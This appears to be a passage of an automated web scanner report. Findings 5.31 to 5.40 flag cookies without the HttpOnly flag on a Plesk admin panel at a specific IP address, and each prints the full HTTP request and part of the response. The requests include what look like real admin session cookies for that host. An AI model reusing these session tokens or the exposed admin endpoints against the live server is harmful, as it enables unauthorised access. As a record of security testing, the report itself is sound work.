<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.31. https://50.22.21.242:8443/admin/index.php/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /admin/index.php/home HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home
Content-Type: multipart/form-data; boundary=--------197049529
Content-Length: 2294
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

----------197049529
Content-Disposition: form-data; name="cmd"

update
----------197049529
Content-Disposition: form-data; name="previous_page"


----------197049529
Content-Disposition: form
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:28 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:29 GMT
Connection: close
Content-Length: 16721

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.32. https://50.22.21.242:8443/admin/index.php/reseller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=credentials-info

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9999

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.33. https://50.22.21.242:8443/admin/index.php/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/login-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/login-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:03:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.34. https://50.22.21.242:8443/admin/index.php/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/personal-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/personal-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/personal-info/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10013

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.35. https://50.22.21.242:8443/admin/index.php/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/tools/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/tools/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/tools/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:52 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10185

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.36. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/tools/id/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/tools/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/tools/id/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10008

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.37. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/tools/id/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/tools/id/1/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/tools/id/1/?context=reseller-tools
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard; BarExpanded=True

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:06:37 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.38. https://50.22.21.242:8443/admin/index.php/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/subscription/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/subscription/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; BarExpanded=True; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:08:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10003

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.39. https://50.22.21.242:8443/admin/index.php/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/subscription/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/subscription/list HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/subscription/list?context=subscriptions
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; BarExpanded=True; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:07:11 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10007

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.40. https://50.22.21.242:8443/admin/promotion/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/promotion/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/promotion/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; psaContext=tools; 